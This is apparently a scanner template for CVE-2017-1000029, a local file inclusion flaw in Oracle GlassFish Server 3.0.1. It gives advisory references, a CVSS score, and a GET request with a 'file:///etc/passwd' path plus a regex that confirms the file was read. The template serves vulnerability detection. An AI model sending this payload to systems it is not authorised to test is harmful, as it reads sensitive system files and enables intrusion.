35 lines
1.1 KiB
YAML
35 lines
1.1 KiB
YAML
|
id: CVE-2017-1000029
|
||
|
|
||
|
info:
|
||
|
name: Oracle GlassFish Server Open Source Edition 3.0.1 - Local File Inclusion
|
||
|
author: 0x_Akoko
|
||
|
severity: high
|
||
|
description: Oracle GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to unauthenticated local file inclusion vulnerabilities that allow remote attackers to request arbitrary files on the server.
|
||
|
reference:
|
||
|
- https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18784
|
||
|
- https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-011/?fid=8037
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-1000029
|
||
|
classification:
|
||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||
|
cvss-score: 7.5
|
||
|
cve-id: CVE-2017-1000029
|
||
|
cwe-id: CWE-200
|
||
|
tags: cve,cve2017,glassfish,oracle,lfi
|
||
|
|
||
|
http:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/resource/file%3a///etc/passwd/"
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: regex
|
||
|
regex:
|
||
|
- "root:[x*]:0:0:"
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|
||
|
|
||
|
# Enhanced by mp on 2022/10/24
|